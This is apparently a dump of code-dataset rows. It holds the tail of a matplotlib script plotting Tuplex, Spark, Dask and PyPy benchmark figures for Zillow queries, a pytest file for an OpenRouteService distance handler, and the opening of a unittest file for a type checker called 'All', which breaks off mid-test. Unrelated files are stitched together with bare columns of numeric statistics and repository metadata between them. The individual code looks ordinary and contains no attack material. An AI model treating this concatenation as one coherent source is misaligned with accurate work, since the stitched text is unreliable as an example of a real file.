    plt_bar(ax, 2, spark_dict_time, w, pyspark_col, 'PySpark (dict)', 'center',
            precision=precision, yerr=spark_dict_time_err, fsize=fsize)
    plt_bar(ax, 3, spark_tuple_time, w, pyspark_col, 'PySpark (tuple)', 'center', precision=precision,
            yerr=spark_tuple_time_err, fsize=fsize)
    plt_bar(ax, 1, spark_sql_time, w, pysparksql_col, 'PySparkSQL', 'center', precision=precision,
            yerr=spark_sql_time_err, fsize=fsize)
    dask_time_err = np.array([df_mt_std[df_mt_std['framework'] == 'dask']['job_time']])
    tplx_time_err = np.array([df_mt_std[df_mt_std['framework'] == 'tuplex']['job_time']])
    plt_bar(ax, 0, df_mt_mu[df_mt_mu['framework'] == 'dask']['job_time'], w, dask_col,
            'Dask', 'center', above_offset=ao, precision=precision, yerr=dask_time_err, fsize=fsize)
    plt_bar(ax, 4, df_mt_mu[df_mt_mu['framework'] == 'tuplex']['job_time'], w, tplx_col,
            'Tuplex', 'above', above_offset=ao, precision=precision, yerr=tplx_time_err, fsize=fsize)
    ax.axvline(4.5, linestyle='--', lw=2, color=[.6, .6, .6])
    plt_bar(ax, 5, spark_scala_time, w, scala_col,
            'Scala', 'center', above_offset=ao, precision=precision, yerr=spark_scala_time_err, fsize=fsize)
    legend_elements = [
        Line2D([0], [0], marker='o', color='w', label='PySpark',
               markerfacecolor=pyspark_col, markersize=mks),
        # fixed: this entry was also labelled 'PySpark', although it carries
        # the PySparkSQL color (cf. the cols list right below)
        Line2D([0], [0], marker='o', color='w', label='PySparkSQL',
               markerfacecolor=pysparksql_col, markersize=mks),
        Line2D([0], [0], marker='o', color='w', label='Dask',
               markerfacecolor=dask_col, markersize=mks),
        Line2D([0], [0], marker='o', color='w', label='Tuplex',
               markerfacecolor=tplx_col, markersize=mks),
        Line2D([0], [0], marker='o', color='w', label='SparkSQL(Scala)',
               markerfacecolor=scala_col, markersize=mks)]
    # legend (also valid for Z2)
    L = ax.legend(handles=legend_elements, loc='upper right', fontsize=15,
                  bbox_to_anchor=(1, 1), borderaxespad=-.4, handletextpad=0., ncol=3, columnspacing=0)
    cols = [pyspark_col, pysparksql_col, dask_col, tplx_col, scala_col]
    for i, text in enumerate(L.get_texts()):
        text.set_color(cols[i])
    ax.set_xticks([0, 1, 2, 3, 4, 5])
    ax.set_xticklabels(['Dask', 'SQL', 'dict', 'tuple', 'Tuplex', 'Scala'], rotation=rot)
    ax.grid(axis='x')
    sns.despine()
    ax.set_ylim(0, lim_high)
    ax.set_xlim(-.5, 5.5)
    ax.set_xlabel('({}b) 16x parallelism'.format(query_name), fontsize=27, labelpad=15)
    plt.savefig(os.path.join(output_folder, 'figure3_zillow_10G_{}.pdf'.format(query_name)), transparent=True, bbox_inches='tight', pad_inches=0)
    # ------------------------------------------------------------------
    # Z2 part
    # ------------------------------------------------------------------
    # ### Z2:
    logging.info('Plotting Z2')
    df = df_Z2.copy()
    query_name = 'Z2'
    # drop tuplex preload
    df = df[df['type'] != 'single-threaded-preload']
    # Same derivation as for Z1 (the duplicated second pass from the
    # original was removed here as well).
    df_st = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(st_fws))]
    df_st = df_st[~df_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
    df_st_mu = df_st.groupby(['framework', 'type']).mean().reset_index()
    df_st_std = df_st.groupby(['framework', 'type']).std().reset_index()
    df_st_tuple = df_st_mu[df_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
    df_st_dict = df_st_mu[df_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
    df_st_rest = df_st_mu[~df_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
    df_st_tuple_std = df_st_std[df_st_std['type'] == 'tuple']
    df_st_dict_std = df_st_std[df_st_std['type'] == 'dict']
    df_st_rest_std = df_st_std[~df_st_std['type'].isin(['tuple', 'dict'])]
    df_mt = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(mt_fws))]
    df_mt = df_mt[~df_mt['type'].isin(['single-threaded', 'cached', 'preload'])]
    df_mt_mu = df_mt.groupby(['framework', 'type']).mean().reset_index()
    df_mt_std = df_mt.groupby(['framework', 'type']).std().reset_index()
    sf = 1.1
    fig, axs = plt.subplots(figsize=(sf * column_width,
                                     sf * column_width / rho * 0.54), nrows=1, ncols=2, constrained_layout=True)
    rot = 25
    mks = 20
    w = .8
    w2 = w / 2
    precision = 1
    cc_col = [0, 0, 0]
    tplx_col = sns.color_palette()[0]
    dask_col = np.array(sns.color_palette()[3])
    pyspark_col = 1.2 * np.array(sns.color_palette()[2])
    pysparksql_col = 0.6 * np.array(pyspark_col)
    py_col = pyspark_col
    cython_col = [161 / 255., 67 / 255., 133 / 255.]
    nuitka_col = [123 / 255, 88 / 255, 219 / 255.]
    scala_col = [.6, .6, .6]
    axs = list(axs.flat)
    ao = 2.5 * 650 / 540
    ##### SINGLE-THREADED ######
    ax = axs[0]
    python3_dict_err = np.array([df_st_dict_std[df_st_dict_std['framework'] == 'python3']['job_time']])
    python3_tuple_err = np.array([df_st_tuple_std[df_st_tuple_std['framework'] == 'python3']['job_time']])
    pandas_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'pandas']['job_time']])
    tplx_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'tuplex']['job_time']])
    cc_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'c++']['job_time']])
    scala_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'scala']['job_time']])
    plt_bar(ax, 1, df_st_dict[df_st_dict['framework'] == 'python3']['job_time'], w, py_col,
            'Python', 'center', precision=precision, yerr=python3_dict_err)
    plt_bar(ax, 2, df_st_tuple[df_st_tuple['framework'] == 'python3']['job_time'],
            w, py_col, 'Python', 'center', above_offset=ao * 10, precision=precision, yerr=python3_tuple_err)
    plt_bar(ax, 0, df_st_rest[df_st_rest['framework'] == 'pandas']['job_time'],
            w, dask_col, 'Pandas', 'center', above_offset=ao * 10, precision=precision, yerr=pandas_err)
    plt_bar(ax, 3, df_st_rest[df_st_rest['framework'] == 'tuplex']['job_time'],
            w, tplx_col, 'Tuplex', 'above', precision=precision, above_offset=ao * 10, yerr=tplx_err)
    plt_bar(ax, 4, df_st_rest[df_st_rest['framework'] == 'scala']['job_time'],
            w, scala_col, 'Scala', 'above', precision=precision, above_offset=ao * 10, yerr=scala_err)
    plt_bar(ax, 5, df_st_rest[df_st_rest['framework'] == 'c++']['job_time'],
            w, cc_col, 'C++', 'above', precision=precision, above_offset=ao * 10, yerr=cc_err)
    ax.axvline(3.5, linestyle='--', lw=2, color=[.6, .6, .6])
    # No per-panel legend here: the Z1 legend applies to Z2 as well. The
    # original's unused legend_elements list was removed.
    ax.set_xticks([0, 1, 2, 3, 4, 5])
    ax.set_xticklabels(['Pandas', 'dict', 'tuple', 'Tuplex', 'Scala', 'C++'], rotation=rot)
    ax.grid(axis='x')
    sns.despine()
    ax.set_ylim(0, 650)
    ax.set_xlim(-.5, 5.5)
    ax.set_xlabel('({}a) single-threaded'.format(query_name), fontsize=27, labelpad=15)
    ax.set_ylabel('runtime in s', labelpad=10)
    ##### MULTI-THREADED ######
    ax = axs[1]
    spark_sql_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'sql')]['job_time']
    spark_tuple_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'tuple')]['job_time']
    spark_dict_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'dict')]['job_time']
    spark_scala_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'scala-sql')]['job_time']
    spark_sql_time_err = np.array(
        [df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'sql')]['job_time']])
    spark_tuple_time_err = np.array(
        [df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'tuple')]['job_time']])
    spark_dict_time_err = np.array(
        [df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'dict')]['job_time']])
    spark_scala_time_err = np.array(
        [df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'scala-sql')]['job_time']])
    plt_bar(ax, 2, spark_dict_time, w, pyspark_col, 'PySpark (dict)', 'center', precision=precision,
            yerr=spark_dict_time_err)
    plt_bar(ax, 3, spark_tuple_time, w, pyspark_col, 'PySpark (tuple)', 'center', precision=precision,
            yerr=spark_tuple_time_err)
    plt_bar(ax, 1, spark_sql_time, w, pysparksql_col, 'PySparkSQL', 'center', precision=precision,
            yerr=spark_sql_time_err)
    dask_time_err = np.array([df_mt_std[df_mt_std['framework'] == 'dask']['job_time']])
    tplx_time_err = np.array([df_mt_std[df_mt_std['framework'] == 'tuplex']['job_time']])
    plt_bar(ax, 0, df_mt_mu[df_mt_mu['framework'] == 'dask']['job_time'], w, dask_col,
            'Dask', 'center', precision=precision, yerr=dask_time_err)
    plt_bar(ax, 4, df_mt_mu[df_mt_mu['framework'] == 'tuplex']['job_time'], w, tplx_col,
            'Tuplex', 'above', above_offset=ao, precision=precision, yerr=tplx_time_err)
    ax.axvline(4.5, linestyle='--', lw=2, color=[.6, .6, .6])
    plt_bar(ax, 5, spark_scala_time, w, scala_col,
            'Scala', 'above', above_offset=ao, precision=precision, yerr=spark_scala_time_err)
    # disable legend, use from Z1 (dead commented-out legend code removed)
    ax.set_xticks([0, 1, 2, 3, 4, 5])
    ax.set_xticklabels(['Dask', 'SQL', 'dict', 'tuple', 'Tuplex', 'Scala'], rotation=rot)
    ax.grid(axis='x')
    sns.despine()
    ax.set_ylim(0, 65)
    ax.set_xlim(-.5, 5.5)
    ax.set_xlabel('({}b) 16x parallelism'.format(query_name), fontsize=27, labelpad=15)
    plt.savefig(os.path.join(output_folder, 'figure3_zillow_10G_{}.pdf'.format(query_name)), transparent=True, bbox_inches='tight', pad_inches=0)
def figure7(df_Z1, output_folder):
    """Plot Figure 7: Zillow Z1 with CPython vs. PyPy3.

    Panel (a) compares single-threaded runs, panel (b) 16x-parallel runs;
    grey-tinted bars are CPython, saturated bars PyPy3. The figure is saved
    as figure7_zillow_Z1_10G_pypy.pdf in output_folder.

    Relies on module-level names defined elsewhere in this file:
    plt_bar, column_width, rho, plt, sns, np, Line2D, os.
    """
    # ## Zillow Z1 CPython vs. Pypy3
    st_fws = ['tuplex', 'cython', 'nuitka', 'python3', 'c++', 'pandas', 'scala']
    mt_fws = ['tuplex', 'spark', 'dask']
    # which df to use?
    df = df_Z1.copy()
    # drop tuplex preload
    df = df[df['type'] != 'single-threaded-preload']
    # CPython single-threaded results.
    # NOTE(review): the original computed these frames twice in a row with
    # byte-identical expressions; the redundant second pass was removed,
    # along with the unused query_name local.
    df_st = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(st_fws))]
    df_st = df_st[~df_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
    df_st_mu = df_st.groupby(['framework', 'type']).mean().reset_index()
    df_st_std = df_st.groupby(['framework', 'type']).std().reset_index()
    df_st_tuple = df_st_mu[df_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
    df_st_dict = df_st_mu[df_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
    df_st_rest = df_st_mu[~df_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
    df_st_tuple_std = df_st_std[df_st_std['type'] == 'tuple']
    df_st_dict_std = df_st_std[df_st_std['type'] == 'dict']
    df_st_rest_std = df_st_std[~df_st_std['type'].isin(['tuple', 'dict'])]
    # CPython multi-threaded results
    df_mt = df[(df['mode'].isin(['python3', 'c++', 'scala'])) & (df['framework'].isin(mt_fws))]
    df_mt = df_mt[~df_mt['type'].isin(['single-threaded', 'cached', 'preload'])]
    df_mt_mu = df_mt.groupby(['framework', 'type']).mean().reset_index()
    df_mt_std = df_mt.groupby(['framework', 'type']).std().reset_index()
    # PyPy3 single-threaded results
    pp_st = df[(df['mode'].isin(['pypy3'])) & (df['framework'].isin(st_fws))]
    pp_st = pp_st[~pp_st['type'].isin(['multi-threaded', 'cached', 'preload'])]
    pp_st_mu = pp_st.groupby(['framework', 'type', 'mode']).mean().reset_index()
    pp_st_std = pp_st.groupby(['framework', 'type', 'mode']).std().reset_index()
    pp_st_tuple = pp_st_mu[pp_st_mu['type'] == 'tuple'].sort_values(by='job_time').reset_index(drop=True)
    pp_st_dict = pp_st_mu[pp_st_mu['type'] == 'dict'].sort_values(by='job_time').reset_index(drop=True)
    pp_st_rest = pp_st_mu[~pp_st_mu['type'].isin(['tuple', 'dict'])].sort_values(by='job_time').reset_index(drop=True)
    pp_st_tuple_std = pp_st_std[pp_st_std['type'] == 'tuple']
    pp_st_dict_std = pp_st_std[pp_st_std['type'] == 'dict']
    pp_st_rest_std = pp_st_std[~pp_st_std['type'].isin(['tuple', 'dict'])]
    # PyPy3 multi-threaded results
    pp_mt = df[(df['mode'].isin(['pypy3', 'c++'])) & (df['framework'].isin(mt_fws))]
    pp_mt = pp_mt[~pp_mt['type'].isin(['single-threaded', 'cached', 'preload'])]
    pp_mt_mu = pp_mt.groupby(['framework', 'type', 'mode']).mean().reset_index()
    pp_mt_std = pp_mt.groupby(['framework', 'type', 'mode']).std().reset_index()
    # links: https://stackoverflow.com/questions/14852821/aligning-rotated-xticklabels-with-their-respective-xticks
    sf = 1.1
    fig, axs = plt.subplots(figsize=(sf * column_width, sf * column_width / rho * .6),
                            nrows=1, ncols=2, constrained_layout=True)
    rot = 25
    mks = 20
    w = .8
    w2 = w / 2
    w4 = w / 4
    precision = 1
    data_fsize = 26
    cc_col = [0, 0, 0]
    tplx_col = sns.color_palette()[0]
    dask_col = np.array(sns.color_palette()[3])
    pyspark_col = 1.2 * np.array(sns.color_palette()[2])
    pysparksql_col = 0.6 * np.array(pyspark_col)
    py_col = pyspark_col
    cython_col = [161 / 255., 67 / 255., 133 / 255.]
    nuitka_col = [123 / 255, 88 / 255, 219 / 255.]
    # grey-tinted palette variants for the CPython bars
    base_gray = np.array([0.8, .8, .8])
    alpha = 0.1
    py_col_g = alpha * np.array(py_col) + (1. - alpha) * base_gray
    dask_col_g = alpha * dask_col + (1. - alpha) * base_gray
    pyspark_col_g = alpha * np.array(pyspark_col) + (1. - alpha) * base_gray
    pysparksql_col_g = alpha * np.array(pysparksql_col) + (1. - alpha) * base_gray
    axs = list(axs.flat)
    lim_high = 90
    ao = 5
    ##### SINGLE-THREADED ######
    ax = axs[0]
    # NOTE(review): error arrays the original computed here but never used
    # (python3_dict_err, python3_tuple_err, scala_err and values of
    # tplx_err/cc_err/py_err that were shadowed before use) were removed.
    pandas_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'pandas']['job_time']])
    py_err = np.array([df_st_dict_std[df_st_dict_std['framework'] == 'python3']['job_time']])
    pypy_err = np.array([pp_st_dict_std[pp_st_dict_std['framework'] == 'python3']['job_time']])
    plt_bar(ax, -w4, df_st_dict[df_st_dict['framework'] == 'python3']['job_time'], w2, py_col_g, 'Python', yerr=py_err)
    plt_bar(ax, w4, pp_st_dict[pp_st_dict['framework'] == 'python3']['job_time'], w2, py_col, 'Pypy', yerr=pypy_err)
    py_err = np.array([df_st_tuple_std[df_st_tuple_std['framework'] == 'python3']['job_time']])
    pypy_err = np.array([pp_st_tuple_std[pp_st_tuple_std['framework'] == 'python3']['job_time']])
    plt_bar(ax, 1 - w4, df_st_tuple[df_st_tuple['framework'] == 'python3']['job_time'], w2, py_col_g, 'Python', yerr=py_err)
    plt_bar(ax, 1 + w4, pp_st_tuple[pp_st_tuple['framework'] == 'python3']['job_time'], w2, py_col, 'Python', yerr=pypy_err)
    pypy_err = np.array([pp_st_rest_std[pp_st_rest_std['framework'] == 'pandas']['job_time']])
    plt_bar(ax, 2 - w4, df_st_rest[df_st_rest['framework'] == 'pandas']['job_time'], w2, dask_col_g,
            'Pandas', yerr=pandas_err)
    plt_bar(ax, 2 + w4, pp_st_rest[pp_st_rest['framework'] == 'pandas']['job_time'], w2, dask_col,
            'Pandas', yerr=pypy_err)
    tplx_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'tuplex']['job_time']])
    cc_err = np.array([df_st_rest_std[df_st_rest_std['framework'] == 'c++']['job_time']])
    plt_bar(ax, 3, df_st_rest[df_st_rest['framework'] == 'tuplex']['job_time'], w2, tplx_col, 'Tuplex',
            'above', precision=precision, above_offset=ao * 10, yerr=tplx_err, fsize=data_fsize)
    plt_bar(ax, 4, df_st_rest[df_st_rest['framework'] == 'c++']['job_time'], w2, cc_col, 'C++',
            'above', precision=precision, above_offset=ao * 10, yerr=cc_err, fsize=data_fsize)
    ax.axvline(3.5, linestyle='--', lw=2, color=[.6, .6, .6])
    # per-panel legend disabled; the shared figure legend below covers both
    # panels (dead commented-out legend code removed)
    ax.set_xticks([0, 1, 2, 3, 4])
    ax.set_xticklabels(['dict', 'tuple', 'Pandas', 'Tuplex', 'C++'], rotation=rot)
    ax.grid(axis='x')
    sns.despine()
    ax.set_ylim(0, 10 * lim_high)
    ax.set_xlim(-.5, 4.5)
    ax.set_yticks([200, 400, 600])
    ax.set_xlabel('(a) single-threaded', fontsize=27, labelpad=10)
    ax.set_ylabel('runtime in s', labelpad=5)
    ##### MULTI-THREADED ######
    ax = axs[1]
    spark_sql_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'sql')]['job_time']
    spark_tuple_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'tuple')]['job_time']
    spark_dict_time = df_mt_mu[(df_mt_mu['framework'] == 'spark') & (df_mt_mu['type'] == 'dict')]['job_time']
    spark_sql_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'sql')]['job_time']])
    spark_tuple_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'tuple')]['job_time']])
    spark_dict_time_err = np.array([df_mt_std[(df_mt_std['framework'] == 'spark') & (df_mt_std['type'] == 'dict')]['job_time']])
    pp_spark_sql_time = pp_mt_mu[(pp_mt_mu['framework'] == 'spark') & (pp_mt_mu['type'] == 'sql')]['job_time']
    pp_spark_tuple_time = pp_mt_mu[(pp_mt_mu['framework'] == 'spark') & (pp_mt_mu['type'] == 'tuple')]['job_time']
    pp_spark_dict_time = pp_mt_mu[(pp_mt_mu['framework'] == 'spark') & (pp_mt_mu['type'] == 'dict')]['job_time']
    pp_spark_sql_time_err = np.array([pp_mt_std[(pp_mt_std['framework'] == 'spark') & (pp_mt_std['type'] == 'sql')]['job_time']])
    pp_spark_tuple_time_err = np.array([pp_mt_std[(pp_mt_std['framework'] == 'spark') & (pp_mt_std['type'] == 'tuple')]['job_time']])
    pp_spark_dict_time_err = np.array([pp_mt_std[(pp_mt_std['framework'] == 'spark') & (pp_mt_std['type'] == 'dict')]['job_time']])
    plt_bar(ax, -w4, spark_dict_time, w2, pyspark_col_g, 'PySpark (dict)', yerr=spark_dict_time_err)
    plt_bar(ax, w4, pp_spark_dict_time, w2, pyspark_col, 'PySpark (dict)', yerr=pp_spark_dict_time_err)
    plt_bar(ax, 1 - w4, spark_tuple_time, w2, pyspark_col_g, 'PySpark (tuple)', yerr=spark_tuple_time_err)
    plt_bar(ax, 1 + w4, pp_spark_tuple_time, w2, pyspark_col, 'PySpark (tuple)', yerr=pp_spark_tuple_time_err)
    plt_bar(ax, 2 - w4, spark_sql_time, w2, pysparksql_col_g, 'PySparkSQL', yerr=spark_sql_time_err)
    plt_bar(ax, 2 + w4, pp_spark_sql_time, w2, pysparksql_col, 'PySparkSQL', yerr=pp_spark_sql_time_err)
    dask_py_err = np.array([df_mt_std[df_mt_std['framework'] == 'dask']['job_time']])
    # BUG FIX: the original masked the PyPy frames with boolean masks built
    # from the CPython frames (pp_mt_std[df_mt_std[...]] and
    # pp_mt_mu[df_mt_mu[...]]), which misaligns rows (or raises) whenever
    # the two frames differ. The masks now come from the pp frames.
    dask_pypy_err = np.array([pp_mt_std[pp_mt_std['framework'] == 'dask']['job_time']])
    plt_bar(ax, 3 - w4, df_mt_mu[df_mt_mu['framework'] == 'dask']['job_time'], w2, dask_col_g, 'Dask', yerr=dask_py_err)
    plt_bar(ax, 3 + w4, pp_mt_mu[pp_mt_mu['framework'] == 'dask']['job_time'], w2, dask_col, 'Dask', yerr=dask_pypy_err)
    tplx_err = np.array([df_mt_std[df_mt_std['framework'] == 'tuplex']['job_time']])
    plt_bar(ax, 4, df_mt_mu[df_mt_mu['framework'] == 'tuplex']['job_time'], w2, tplx_col,
            'Tuplex', 'above', above_offset=ao, precision=precision, yerr=tplx_err, fsize=data_fsize)
    legend_elements = [Line2D([0], [0], marker='o', color='w', label='Python / PySpark',
                              markerfacecolor=pyspark_col, markersize=mks),
                       Line2D([0], [0], marker='o', color='w', label='PySparkSQL',
                              markerfacecolor=pysparksql_col, markersize=mks),
                       Line2D([0], [0], marker='o', color='w', label='Pandas / Dask',
                              markerfacecolor=dask_col, markersize=mks),
                       Line2D([0], [0], marker='o', color='w', label='Tuplex',
                              markerfacecolor=tplx_col, markersize=mks),
                       Line2D([0], [0], pickradius=2, marker='o', color='w', label='C++ (hand-opt.)',
                              markerfacecolor=cc_col, markersize=mks)]
    L = fig.legend(handles=legend_elements, loc='upper right', bbox_transform=plt.gcf().transFigure,
                   bbox_to_anchor=(0.01, 0, 1, 1), fontsize=17,
                   borderaxespad=0.4, handletextpad=0., ncol=5, columnspacing=0)
    cols = [pyspark_col, pysparksql_col, dask_col, tplx_col, cc_col]
    for i, text in enumerate(L.get_texts()):
        text.set_color(cols[i])
    ax.set_xticks([0, 1, 2, 3, 4])
    ax.set_xticklabels(['dict', 'tuple', 'SQL', 'Dask', 'Tuplex'], rotation=rot)
    ax.grid(axis='x')
    sns.despine()
    ax.set_ylim(0, lim_high)
    ax.set_xlim(-.5, 4.5)
    ax.set_yticks([20, 40, 60])
    ax.set_xlabel('(b) 16x parallelism', fontsize=27, labelpad=10)
    plt.savefig(os.path.join(output_folder, 'figure7_zillow_Z1_10G_pypy.pdf'), transparent=True, bbox_inches='tight', pad_inches=0)
| 51.106502
| 193
| 0.570382
| 6,339
| 45,587
| 3.823789
| 0.065152
| 0.038946
| 0.018771
| 0.019803
| 0.835719
| 0.810017
| 0.782788
| 0.75032
| 0.729444
| 0.707455
| 0
| 0.023532
| 0.241209
| 45,587
| 892
| 194
| 51.106502
| 0.677199
| 0.071161
| 0
| 0.544
| 0
| 0.0032
| 0.167962
| 0.004622
| 0
| 0
| 0
| 0.001121
| 0
| 1
| 0.008
| false
| 0.0016
| 0.0256
| 0
| 0.0368
| 0.0016
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7713334451d3b2aa2bf2e20fc574a1c5b413da32
| 2,593
|
py
|
Python
|
openrouteservice_handler/test_openrouteservice_handler.py
|
ThorsHamster/find_new_hometown
|
862231bb1f3a0a1505d02b452adca2b45a6fc850
|
[
"MIT"
] | 2
|
2020-01-07T07:28:17.000Z
|
2020-01-07T10:21:41.000Z
|
openrouteservice_handler/test_openrouteservice_handler.py
|
ThorsHamster/find_new_hometown
|
862231bb1f3a0a1505d02b452adca2b45a6fc850
|
[
"MIT"
] | 30
|
2021-03-19T15:46:29.000Z
|
2021-12-21T12:22:50.000Z
|
openrouteservice_handler/test_openrouteservice_handler.py
|
ThorsHamster/find_new_hometown
|
862231bb1f3a0a1505d02b452adca2b45a6fc850
|
[
"MIT"
] | null | null | null |
import pytest
from openrouteservice_handler import OpenRouteServiceHandler
class MockCoordinate:
    """Minimal coordinate stand-in: both components start at zero."""

    def __init__(self):
        self.latitude = 0
        self.longitude = 0
@pytest.fixture
def unit_under_test(mocker):
    """Provide an OpenRouteServiceHandler built with a dummy API key."""
    handler = OpenRouteServiceHandler('api_key')
    return handler
def test_get_distance_duration_between_cities_standard_layout(unit_under_test, mocker):
    """Matrices laid out with the result in row 0, column 1."""
    matrix = {'distances': [[0, 3], [0, 0]], 'durations': [[0, 7], [0, 0]]}
    mocker.patch(
        'openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.distance_matrix',
        return_value=matrix)
    dist, dur = unit_under_test.get_distance_duration_between_cities(MockCoordinate(), MockCoordinate())
    assert dist == 3
    assert dur == 7
def test_get_distance_duration_between_cities_switched_layout(unit_under_test, mocker):
    """Transposed matrix layout: values sit in row 1, column 0 instead."""
    fake_matrix = {'distances': [[0, 0], [3, 0]], 'durations': [[0, 0], [7, 0]]}
    mocker.patch(
        'openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.distance_matrix',
        return_value=fake_matrix)
    distance, duration = unit_under_test.get_distance_duration_between_cities(
        MockCoordinate(), MockCoordinate())
    assert distance == 3
    assert duration == 7
def test_get_distance_duration_between_cities_no_return_value(unit_under_test, mocker):
    """A missing API response must surface as a ValueError."""
    mocker.patch(
        'openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.distance_matrix',
        return_value=None)
    with pytest.raises(ValueError, match='Could not collect data from OpenRouteService. Maybe wrong api key?'):
        unit_under_test.get_distance_duration_between_cities(MockCoordinate(), MockCoordinate())
def test_get_coordinate_of_city_city_found(unit_under_test, mocker):
    """Longitude/latitude come from the first feature's geometry pair."""
    geo_response = {'features': [{'geometry': {'coordinates': [3, 7]}}]}
    mocker.patch(
        'openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.pelias_search',
        return_value=geo_response)
    result = unit_under_test.get_coordinate_of_city('test_city')
    assert result.longitude == 3
    assert result.latitude == 7
def test_get_coordinate_of_city_city_not_found(unit_under_test, mocker):
    """An empty geocoding response must surface as a ValueError."""
    mocker.patch(
        'openrouteservice_handler.openrouteservice_handler.openrouteservice.Client.pelias_search',
        return_value=None)
    with pytest.raises(ValueError, match='Could not collect data from OpenRouteService. Maybe wrong api key?'):
        unit_under_test.get_coordinate_of_city('test_city')
| 42.508197
| 111
| 0.715773
| 284
| 2,593
| 6.172535
| 0.211268
| 0.144324
| 0.081574
| 0.065031
| 0.800342
| 0.800342
| 0.800342
| 0.743868
| 0.743868
| 0.707359
| 0
| 0.012411
| 0.192056
| 2,593
| 60
| 112
| 43.216667
| 0.824344
| 0
| 0
| 0.435897
| 0
| 0
| 0.254917
| 0.170073
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.179487
| false
| 0
| 0.051282
| 0.025641
| 0.282051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
91f1a382e9cb9885851e05853c7c065c0b6e9a04
| 34,094
|
py
|
Python
|
checkerpy/tests/types/all/test_all.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | 1
|
2018-01-12T19:20:51.000Z
|
2018-01-12T19:20:51.000Z
|
checkerpy/tests/types/all/test_all.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | null | null | null |
checkerpy/tests/types/all/test_all.py
|
yedivanseven/CheckerPy
|
04612086d25fecdd0b20ca0a050db8620c437b0e
|
[
"MIT"
] | null | null | null |
import logging
import unittest as ut
from collections import defaultdict, deque, OrderedDict
from ....functional import CompositionOf
from ....types.all import All
from ....types.one import _REDUCED_ITER
from ....exceptions import WrongTypeError, IterError, CallableError
class TestAllInstatiation(ut.TestCase):
    """Construction of All: identifier validation and the `types` attribute.

    NOTE(review): class name typo ('Instatiation' -> 'Instantiation') kept,
    since renaming would change unittest discovery IDs.
    """

    def test_error_on_wrong_identifier(self):
        expected = 'Type-checker name @foo is not a valid identifier!'
        with self.assertRaises(ValueError) as context:
            _ = All(int, identifier='@foo')
        self.assertEqual(str(context.exception), expected)

    def test_has_default_name(self):
        checker = All(int)
        self.assertEqual(checker.__name__, 'All')

    def test_identifier_sets_name_attribute(self):
        checker = All(int, identifier='AllInt')
        self.assertEqual(checker.__name__, 'AllInt')

    def test_has_attribute_types_with_one_valid_type(self):
        checker = All(int)
        self.assertTrue(hasattr(checker, 'types'))

    def test_cannot_set_attribute_types(self):
        checker = All(int)
        with self.assertRaises(AttributeError):
            checker.types = 'foo'

    def test_attribute_types_has_correct_value_with_one_valid_type(self):
        checker = All(int)
        self.assertTupleEqual(checker.types, (int, ))

    def test_works_with_two_valid_types(self):
        _ = All(int, float)

    def test_has_attribute_types_with_two_valid_types(self):
        checker = All(int, float)
        self.assertTrue(hasattr(checker, 'types'))

    def test_attribute_types_has_correct_value_with_two_valid_types(self):
        checker = All(int, float)
        self.assertTupleEqual(checker.types, (int, float))
class TestAllWorks(ut.TestCase):
    """All(...) must accept every common iterable and hand it back unchanged,
    preserving the concrete container type.
    """

    def test_works_with_str(self):
        AllStr = All(str)
        s = AllStr('foo')
        self.assertIsInstance(s, str)
        self.assertEqual(s, 'foo')

    def test_works_with_tuple(self):
        AllStr = All(str)
        t = AllStr(('f', 'o', 'o'))
        self.assertTupleEqual(t, ('f', 'o', 'o'))

    def test_works_with_list(self):
